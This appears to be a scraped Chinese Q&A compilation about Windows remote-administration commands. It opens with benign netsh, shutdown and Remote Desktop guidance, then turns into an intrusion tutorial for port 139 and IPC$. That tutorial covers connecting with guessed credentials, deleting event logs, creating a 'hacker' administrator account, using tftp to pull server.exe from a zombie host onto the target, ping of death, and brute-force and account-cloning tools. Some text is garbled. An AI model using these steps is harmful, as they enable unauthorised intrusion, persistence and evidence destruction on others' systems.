⑴ 如何使用CMD命令遠程重啟Windows伺服器
有時不想去機房,並且遠程桌面連接登錄不上了,需要遠程重啟伺服器的,這時可以使用命令行方式遠程重啟。在cmd命令行狀態下輸入:shutdown -r -m \\192.168.1.10 -t 0 -f //換成你的IP,-f表示強制重啟有可能出現拒絕訪問<5>的提示,表示你沒有許可權,這時輸入下面命令:net use \\192.168.1.10\ipc$ "password" /user:"username" //使用有效的用戶名和密碼再次執行shutdown命令即可重啟。
⑵ 如何在Windows命令行下配置IP地址
常用的netsh命令:
(1)設置 WindowsXP「本地連接」的IP地址為10.223.3.254,子網為255.255.255.0,網關為10.223.3.1,躍點數為1.C:\>netsh interface ip set address name="local area connection" source=static addr=10.223.3.254 mask=255.255.255.0 gateway=10.223.3.1
gwmetric=auto
(2)設置 WindowsXP 「本地連接」的IP地址自動獲取C:\>netsh interface ip set address name="local area connection" source=dhcp
(3)設置 WindowsXP「本地連接」的DNS為10.223.3.2C:\>netsh interface ip set dns name="local area connection" source=static addr=10.223.3.2 register=primary
(4)設置 WindowsXP「本地連接」的 DNS為自動獲取C:\>netsh interface ip set dns name="local area connection" source=dhcp
附:netsh命令配置IP地址、DNS的詳細用法
一、添加 IP 地址及默認網關 (是添加,要重設或更新原來IP的請看第三點)
netsh interface ip add address
用法 : add address [name=] [[addr=]IP address [mask=]IP subnet mask]
[[gateway=]IP address [gwmetric=]integer]
參數 :
name - IP 介面名稱。
addr - 要添加到此介面的 IP 地址。
mask - 指定 IP 地址的 IP 子網掩碼。
gateway - 指定 IP 地址的默認網關。
gwmetric - 默認網關的躍點數。
注釋 : 向一個用靜態 IP 地址配置的介面添加 IP 地址和默認網關。
示例 :
add address "Local Area Connection" 10.0.0.2 255.0.0.0
add address "Local Area Connection" gateway=10.0.0.3 gwmetric=2
第一個命令向本地連接介面添加一個靜態 IP 地址 10.0.0.2 ,子網掩碼為 255.0.0.0。
第二個命令向網關躍點數為 2 的介面添加 IP 地址,10.0.0.3 作為第二個默認網關。
我的實例 :(1)netsh interface ip add address "LocalConnection" 172.20.0.49 255.255.252.0
此命令設置 LocalConnection 的 IP 為 172.20.0.49, 子網掩碼為 255.255.252.0
(2) C:\>netsh interface ip add address "LocalConnection" gateway=172.20.0.254 gwmetric=1
此命令設置 Localconnection 的默認網關為 172.20.0.254, 默認網關的躍點數為 1
二、添加 DNS
netsh interface ip add dns
用法 : add dns [name=] [addr=] [[index=]integer]
參 數 :
標記 數值
name - 添加 DNS 伺服器的介面的名稱。
addr - 添加的 DNS 伺服器的 IP 地址。
index - 為指定的 DNS 伺服器地址。
指定索引 ( 首選項 ) 。
說 明 : 靜態添加新的 DNS 伺服器 IP 地址或重新索引現有 DNS 伺服器地址的列表以修改 DNS 伺服器首選項。
例如 :add dns "Local Area Connection" 10.0.0.1
add dns "Local Area Connection" 10.0.0.3 index=2
我的實例:netsh interface ip add dns "LocalConnection" 172.20.0.1
netsh interface ip add dns "LocalConnection" 202.96.128.68 index=2
三、設置 IP 地址、默認網關及 DNS :
netsh interface IP set address local static 172.20.0.49 255.255.252.0 設置 IP 及子網掩碼
netsh interface IP set address local static gateway=172.20.0.254 gwmetric=1
(set address source=dhcp 此條表示從 dhcp 伺服器得到 IP)
netsh interface IP set dns "LocalConnection" static 172.20.0.1
(set dns source=dhcp)
四、 綜合例
netsh interface IP set address local static 172.20.0.49 255.255.252.0
netsh interface IP set address local static gateway=172.20.0.254 gwmetric=1
netsh interface IP set dns "LocalConnection" static 172.20.0.1
netsh interface ip add dns "LocalConnection" 202.96.128.68 index=2
以上命令做成批處理:
edit setIP.bat
netsh interface IP set address local static %2 255.255.252.0
netsh interface IP set address local static gateway=172.20.0.254 gwmetric=1
netsh interface IP set dns "%1" static 172.20.0.1
netsh interface ip add dns "%1" 202.96.128.68 index=2
setIP.bat 的命令用法是:
setIP 網路介面名 IP 地址
例如:setip LocalConnection 172.20.0.49
具體點就是:
在DOS模式下修改網關和IP地址(XP)
設置/修改IP地址,子網掩碼,網關的 格式:
先輸入netsh 回車
再輸入interface ip 回車
接著輸入set address "本地連接" static 10.25.35.35 255.255.255.0 10.25.35.7 auto
有時需要反復輸入set address "本地連接" static 10.25.35.35 255.255.255.0 10.25.35.7 auto 直到出現回顯
命令的意思是將「本地連接」
ip地址設置成 10.25.35.35
子網掩碼是 255.255.255.0
網關設置成 10.25.35.7 並且自動躍點數
注意:"本地連接"處請根據自己的情況修改
設置DNS命令格式:
先輸入 netsh 回車
再輸入interface ip 回車
接著輸入set dns "本地連接" static 202.96.128.86
命令的意思是將「本地連接」的DNS設置成202.96.128.86
有時需要反復輸入set dns "本地連接" static 202.96.128.86
直到出現回顯
刪除IP地址和DNS的命令是
先輸入 netsh 回車
再輸入interface ip 回車
接著輸入set address "本地連接" dhcp
或set dns "本地連接" dhcp
⑶ 如何用命令開啟遠程桌面連接伺服器
1.用Mstsc (Microsoft terminal services client)
創建與終端伺服器或其他遠程計算機的連接,編輯現有「遠程桌面連接(.rdp)」配置文件,並將 Windows XP 連接(使用「客戶端國防部設備 接管理器」創建的連接)遷移到新的 .rdp 文件中。
Mstsc還有一種說法,Microsoft Telnet Screen Control ,即「微軟遠程桌面控制」。
2.語法
mstsc.exe{ConnectionFile|/v:server} [/console] [/f] [/w:width /h:height]
mstsc.exe /edit"ConnectionFile"
mstsc.exe /migrate
3.用法
點擊開始--運行--mstsc
確定
就可以打開遠程桌面連接了
輸入你想連接已經開啟遠程桌面的地址就可以連接了
4.注意事項
您必須是要連接的伺服器上的管理員才能創建遠程式控制制台連接。
對於每個用戶來說,.rdp 文件在「我的文檔」中是作為隱藏文件存儲的。
mstsc 與遠程客戶端之間是用Microsoft的遠程桌面協議(Remote Desktop Protocol,簡稱RDP) 連接的,而windows xp的rdp有1個並發數的連接限制。
⑷ 如何開啟Windows遠程桌面服務
方法如下:
1、滑鼠右擊win7系統桌面「計算機」圖標,選擇「屬性」選項;
2、在打開的計算機屬性左側選擇「遠程設置」功能;www.xitongcheng.com。
3、在打開的「系統屬性」菜單中,切換到「遠程『選項卡,在下方的「遠程桌面」欄中,選擇第三個選項;
4、點擊「選擇用戶」按鈕,添加一個可以遠程到本計算機的用戶(建議選擇管理員用戶);
5、添加好之後,點擊「選擇用戶」按鈕可以查看當前添加到「遠程桌面組」的用戶成員;
6、如果遠程桌面開啟失敗,到服務控制台裡面去找到「remotedesktopservices」依賴的幾個服務;
7、查看這些服務是不是被禁用了,如果是,都開啟一下。
⑸ windows下遠程登錄命令是
標準的遠程登錄命令是:telnet,格式如下:telnet 對方的遠程伺服器的 IP 地址
⑹ 如何用windows的cmd遠程連接伺服器
點擊開始菜單->運行 (或者 windows+R) ,輸入」mstsc」命令,
打開遠程桌面連接對話框,輸入你要連接的Windows server伺服器的公網IP。
⑺ 如何打開window遠程桌面連接
判斷目標伺服器是否和本機網路連通,使用ping命令進行測試。對ping命令不熟悉的朋友請參考下方經驗引用進行操作。
網路連接沒有問題後用telnet命令判斷目標伺服器遠程連接埠是否開啟,windows系統默認的遠程連接埠是3389。對telnet命令不熟悉的朋友請參考下方經驗引用進行操作。
遠程連接目標伺服器的前提:
1目標伺服器已關閉防火牆
2目標伺服器已在我的電腦中開啟了遠程服務
3目標伺服器用戶名設有密碼,未設置密碼無法遠程
開啟遠程的方式:右鍵我的電腦、遠程設置
依次選擇「開始菜單」、「附件」、「遠程桌面連接」。計算機處填寫目標伺服器的ip地址
連接到目標伺服器後彈出登錄框,輸入目標伺服器的賬戶密碼後即可登錄。
注意事項
目標伺服器防火牆關閉
目標伺服器已開啟遠程服務
本機到目標伺服器的網路是暢通的
目標伺服器的用戶設置有登錄密碼,未設置密碼無法登錄
⑻ 如何通過dos 命令連接遠程主機,連接後怎麼控制
常用的DOS命令建立到遠程主機的連接
net use \\ip\ipc$ "password"
/user:"username"
建立新用戶
net user username password /add
修改用戶密碼
net
user username newpassword
激活用戶
net user username
/active:yes
把用戶加入到用戶組
net localgroup groupname username
/add
查看遠程主機的時間
net time \\ip
顯示遠程主機的共享資源列表
net view
\\ip
啟動和停止系統服務
net start(stop) servicename
映射對方的硬碟
net use z:
\\ip\c$
啟動程序
at \\ip time programnane
文件復制
filename
\\ip\c$\filename
遠程執行FTP命令
echo open servername > c:\ftp.txt
echo
username >> c:\ftp.txt
echo password >> c:\ftp.txt
echo get
filename c:\filename >> c:\ftp.txt
ftp -s:c:\ftp.txt
del
c:\ftp.txt
刪除日誌
del c:\winnt\system32\logfiles\*.*
del
c:\winnt\ssytem32\config\*.evt
del c:\winnt\system32\dtclog\*.*
del
c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt
del c:\winnt\*.log
訪問對方共享資源
net use \\192.168.1.1\c$
/user:administrator "123"
如果提示連接成功,你在輸入
start \\192.168.1.1\c$
就打開目標機的C盤了
----------------------------------
net use \\ip\ipc$ " "
/user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use
h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C:到本地為H:
net use h: \\ip\c$
登陸後映射對方C:到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del
刪除映射對方到本地的為H:的映射
net user 用戶名密碼/add 建立用戶
net user guest /active:yes
激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup
administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意:administrator後加s用復數
net
start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set
設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net
view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net
pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del
刪除ipc$共享
net share c$ /del 刪除C:共享
net user guest 12345
用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a
查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況,常用netstat -an
netstat -v
查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip
對方136到139其中一個埠開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數-A要大寫
tracert -參數
ip(或計算機名) 跟蹤路由(數據包),參數:「-w數字」用於設置超時間隔。
ping ip(或域名)
向對方主機發送默認大小為32位元組的數據,參數:「-l[空格]數據包大小」;「-n發送數據次數」;「-t」指一直ping。
ping -t -l
65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows
NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數「/all」顯示全部配置信息
tlist -t
以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
kill -F 進程名
加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名
加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR
*.*」表示刪除當前目錄下所有隻讀文件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
#2 二:
del /S /Q 目錄
或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)
move 盤符\路徑\要移動的文件名存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc
one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中,"> "和"> >"
是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務,用參數/yes則不需要確認就直接停止
at
id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r
在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠
遠和登陸伺服器,默認埠為23
open ip 連接到IP(屬telnet登陸後的命令)
telnet 在本機上直接鍵入telnet
將進入本機的telnet
路徑\文件名1路徑\文件名2 /y
復制文件1到指定的目錄為文件2,用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \\ip\admin$
復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg
將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,註:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指ASCLL格式文件
\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.*
復制對方admini$共享下的srv.exe文件(所有文件)至本地C:
x 要復制的文件或目錄樹目標地址\目錄名
復制文件和目錄樹,用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe
c:\server.exe 登陸後,將「IP」的server.exe下載到目標主機c:\server.exe
參數:-i指以二進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送
tftp -i 對方IPput
c:\server.exe 登陸後,上傳本地c:\server.exe至主機
ftp ip 埠
用於上傳文件至伺服器或進行文件操作,默認埠為21。bin指用二進制方式傳送(可執行文件進);默認為ASCII格式傳送(文本文件時)
route
print 顯示出IP路由,將主要顯示網路地址Network addres,子網掩碼Netmask,網關地址Gateway
addres,介面地址Interface
arp 查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp
-a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化(最小化)運行某程序或命令
mem
查看cpu使用情況
attrib 文件名(目錄名) 查看某文件(目錄)的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S
+H 去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬性;用+則是添加為某屬性
dir
查看文件,參數:/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間
date /t 、
time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間,而不必輸入新日期和時間
set
指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元)
顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序,並顯示出:請按任意鍵繼續....
if
在批處理程序中執行條件處理(更多說明見if命令及變數)
goto 標簽
將cmd.exe導向到批處理程序中帶標簽的行(標簽必須單獨一行,且以冒號打頭,例如:「:start」標簽)
call 路徑\批處理文件名
從批處理程序中調用另一個批處理程序 (更多說明見call /?)
for 對一組文件中的每一個文件執行某個特定命令(更多說明見for命令及變數)
echo on或off 打開或關閉echo,僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo
信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt
在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值
設置cmd控制台前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為:EntSky\ )
139埠入侵
net
命令是139埠入侵的重中之重,整個入侵過程會多次用到它。在命令行窗口下輸入net,可以看到有一大堆參數,別被這一大堆參數嚇懷了,現在我來為你一一講解。
net
use
net use
命令用於與遠程主機建立IPC$(管理)連接,當你有遠程計算機的用戶名(通常用戶名為administrator,記住它)和密碼時,在命令行窗口下輸入net
use\\IP\IPC$"password"/user:administrator,你就成功地建立了與遠程計算機的連接。在這之後,可以對其進行管理了。net
use 還有一個用處,即映射遠程機器的共享資源,輸入net use z: \\IP\C$
(注意!在此之後的一切命令都是基於第一個命令的,也就是說必須先建立IPC$連接後,這些命令才會成功),打開「我的電腦」,你會發現多了一個Z盤,裡面全是遠程主機C盤下的東西,你在Z盤里刪除了一個文件,對方C盤下的這個文件就也被刪除了,所有對Z盤的操作其實就是對遠程計算機的C
盤的操作。怎麼樣,是不是很有意思呢?
net view
net view 用於查看遠程計算機有哪些共享資源,通常你會看到my
document之類的共享文件夾,輸入net view \\IP即可。我個人認為net view
沒有太大用處,要知道,在Windows2000中,各個硬碟都是共享的,但是如果你用net view 來查看,你會發現並無C,D,E
之類的共享資源。這是為什麼呢?注意,在這之前的一些命令中,我們曾輸入過IPC$,C$這樣的奇怪東西,其實,Windows2000中,帶"$"後綴的共享資源是隱藏的,在命令行窗口下是無法看到的,Windows2000中各個盤都是以諸如C$,D$,E$
這樣的名稱共享的,所以我們看不到,但確實存在,IPC$也是如此。
net share
net share 用於開放共享,輸入net
share QQ=c:\tencent,你會發現多了一個名為QQ的共享資源。這個命令有慎么作用呢?假設一個主機安全做的不錯,關閉了IPC$,C$,D$
等共享,那麼我們就無法在139埠上建立管理連接,也無法訪問對方的C盤,當我們通過別的手段進入後(如遠程溢出),我們就可以用net share
開放IPC$,從而轉為熟悉的139埠的入侵,開放IPC$ 的命令為net share IPC$。相應的,如果你想關閉共享,你可以加上/del 後綴,例如net
share c$ /del 就關閉了C盤的共享。
net user
net user 命令用於管理主機上的用戶,僅輸入不帶任何參數的net
user 會列出計算機上所有的用戶名。現在就讓我們看看net user
命令是如何對用戶進行操作的。
┎───────────────────────────────────────────────────────┒
┃
net user hacker 12345 /add 建立一個名為hacker,密碼為12345的用戶。
┃
┃ net user hacker /del
刪除名為hacker的用戶。┃
┃ net user hacker
/active:no 禁用hacker這個用戶,這個用戶不能再登陸此計算機。┃
┃ net user hacker
/active:yes 激活已禁用的hacker這個用戶。 ┃
┃ net localgroup
administrator hacker /add 把hacker這個用戶添加進管理員組,即提升hacker的許可權,使之變為管理員 ┃
┖───────────────────────────────────────────────────────┚
net start /
net stop
net start / net stop 命令用於起動/停止系統服務,通常我們會net stop w3svc
(停止網頁服務),然後替換網頁,對此命令我不多講,知道即可。
*at 命令,net
time
之所以把它們放在一起來講,是因為at命令要用到net time命令的結果,一般我們先 net view
\\ip,得到遠程主機的時間(假設得到的時間為9:00),然後at \\ip 9:00 telnet
就啟動了telnet服務,at這個命令就是用來遠程運行程序的.
(5)需要准備的工具
肉雞獵手v1.0掃描一個網段,找出弱密碼的計算機
SMBCrack
針對特定主機,暴力猜解密碼
DameWare Mini Remote Control監控運程屏幕
CA.exe
克隆管理員賬號